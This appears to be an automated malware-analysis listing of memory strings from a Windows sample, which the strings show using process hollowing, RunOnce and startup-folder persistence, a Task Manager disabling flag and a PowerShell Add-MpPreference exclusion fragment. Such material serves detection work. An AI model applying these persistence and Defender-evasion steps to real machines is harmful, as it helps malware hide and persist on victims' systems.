Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: start |
memstr_a4c5ec90-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: crlfhpt |
memstr_25846bfc-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ray.exej |
memstr_7a1a2c2e-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 3bhlt |
memstr_080fbb02-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: eymxo$ |
memstr_e30697c8-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @6b8mt |
memstr_dace0ed2-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: h[8lt |
memstr_cb640584-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: mkhlt |
memstr_4a2950d1-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: msxlt |
memstr_5c206dab-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: script[ |
memstr_ca6bf852-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @x8mt |
memstr_fc039222-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: gxmt |
memstr_dc44330a-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: short |
memstr_608465e7-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: scriptj |
memstr_87c36bb2-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6_hot |
memstr_6045b811-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: reg_szx |
memstr_f3804915-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @ehrt |
memstr_5d86d45f-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 8ehmt |
memstr_a07fc1dd-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: enm l |
memstr_522d35cd-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ho(st |
memstr_bbd16feb-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: scriptl |
memstr_429507d6-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: file =" |
memstr_69d6a379-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ,hd8ot |
memstr_e29c4028-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ,2j8ot |
memstr_424ba123-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: m'hnt |
memstr_6a4f68f0-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 3)xot |
memstr_cfaba98e-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: m?xot |
memstr_b12f2ca1-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: crlfhnt |
memstr_a8c0c16a-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: '6xhot |
memstr_aa82f0d3-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ,88ot |
memstr_5733a420-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: '8hot |
memstr_73896cbc-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shortxpt |
memstr_a94e495b-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: enm8e |
memstr_70796865-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 6:8pt |
memstr_e89ae687-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: auexhn |
memstr_fc3946c3-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 3$8qt |
memstr_d32a4f9d-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: exe_c |
memstr_4b2d79ac-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: batwrite) |
memstr_3a0757cd-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vbsclose8 |
memstr_3f160631-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runoncew |
memstr_01a2dc6d-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: vbswritef |
memstr_ea4d0f31-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: batclose |
memstr_04b59799-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startup |
memstr_51768f26-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_path; |
memstr_4b5821e7-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_pathrtcut |
memstr_04772d44-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hkcu64\software\microsoft\wi |
memstr_98db566c-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startup2version\runonc |
memstr_d720381c-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_pathv |
memstr_15822562-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: antitaskp |
memstr_9f303e67-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: pqgiogoraarleguqldnvhv.exe- |
memstr_bc04aeee-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _runbinary_iswow64process: |
memstr_93d69d38-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _runbinary_unmapviewofsection3 |
memstr_d2a6bd24-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _runbinary_allocateexespace |
memstr_75a408f7-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: tbinary_iswow64processk |
memstr_f36408f0-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: zpsers\user\temp\wgsr.msc@ |
memstr_1a739850-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: c:\windows\system32\msctf.dllv |
memstr_d44156c7-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: _runbinary_iswow64procession |
memstr_7e1a3a86-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: orleql |
memstr_0019bda9-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: p~kpp |
memstr_fe80db5c-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: psers\user\temp\wgsr.msc |
memstr_1c4f5615-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: pqgiogoraarleguqldnvhv.exe |
memstr_aa1320be-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: c:\windows\system32\wldp.dlloc |
memstr_68fed33b-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: c:\windows\system32\ntmarta.dll |
memstr_ced7edc8-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: heapdecommittotalfreethreshold4 |
memstr_d2213020-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: imagesubsystemmajorversionoldy |
memstr_40d49742-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: imagesubsystemminorversionexe |
memstr_79bb2735-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: majoroperatingsystemversion |
memstr_a2c7872b-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readonlysharedmemoryheaponh |
memstr_f2a0d36a-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: heapdecommittotalfreethresholda |
memstr_3683d935-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: heapdecommitfreeblockthreshold~ |
memstr_b76b9c14-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: imagesubsystemmajorversionw |
memstr_17c30e68-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: heapdecommitfreeblockthresholdl |
memstr_dc5931cc-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: poptionalheaderimagebasenewe |
memstr_e09abb44-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readonlysharedmemoryheapsholdr |
memstr_1cf7ca16-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readimagefileexecoptionsshold |
memstr_97646e5c-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readonlysharedmemorybaseon |
memstr_2aeec6ab-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: hrt\se |
memstr_5dbaaffe-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: imagesubsystemminorversiony |
memstr_a4229e41-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readonlystaticserverdatanold |
memstr_883880c2-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: r_<r_<@6p |
memstr_7217a792-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ioptionalheadersizeofheadersnew |
memstr_ec8ca2cb-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ioptionalheadersizeofimagenew |
memstr_86718e50-c |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readimagefileexecoptions |
memstr_63cf842f-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: minoroperatingsystemversion |
memstr_2c94f8e8-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readonlystaticserverdata |
memstr_b5703b2c-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: readonlysharedmemorybase |
memstr_c9b658e9-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: start.cmd" |
memstr_d4d1beea-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: settingsfn. |
memstr_c88a9791-5 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folder! |
memstr_663e1706-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: byte[uctcreate8 |
memstr_2fe1499b-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_path3 |
memstr_c01e2a2f-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: @echo off |
memstr_e0dd84b9-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: variables |
memstr_dc3caedc-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folderi |
memstr_7257dd99-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ini_settingsfile, hidd` |
memstr_f6a107ea-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_folder{ |
memstr_00395157-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: disabletaskmgr\microsou |
memstr_64d8281f-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: variablesl |
memstr_d176d7b8-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \start.cmd^ |
memstr_8c9cfca2-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: ini_settingseturn = trq |
memstr_d123d186-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: variablesnary |
memstr_1dce7744-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: startupdir |
memstr_15e26afd-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: cmd_command_path |
memstr_bd94e64e-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: disabletaskmgr |
memstr_4b895928-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \start.cmd |
memstr_832abf10-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \mshta.exe |
memstr_9539e917-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: wscript.quit |
memstr_7fbafc5b-e |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: install_foldercreateob |
memstr_6190afe8-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: variablesciiarray |
memstr_4476b9b8-d |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dword;int;dword;struct;ptr;int;int;int;ptr;endstruct, |
memstr_ef3387c4-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: const waitonreturn = true |
memstr_c8789ef7-b |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: -command add-mppreference -exclusionpath |
memstr_9b7804f7-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dword pointertosymboltable;ebx; dword edx; dword ecx; { |
memstr_8444f224-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: word sizeofoptionalheader;j |
memstr_be4adb53-a |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: set wshshell = wscript.createobject(e |
memstr_3b80c087-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \microsoft.net\framework\v4.0.30319\applaunch.exet |
memstr_47f964cc-f |
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dword addressofnewexeheadert64 p2home; uint64 p3home; |
memstr_b359621b-a |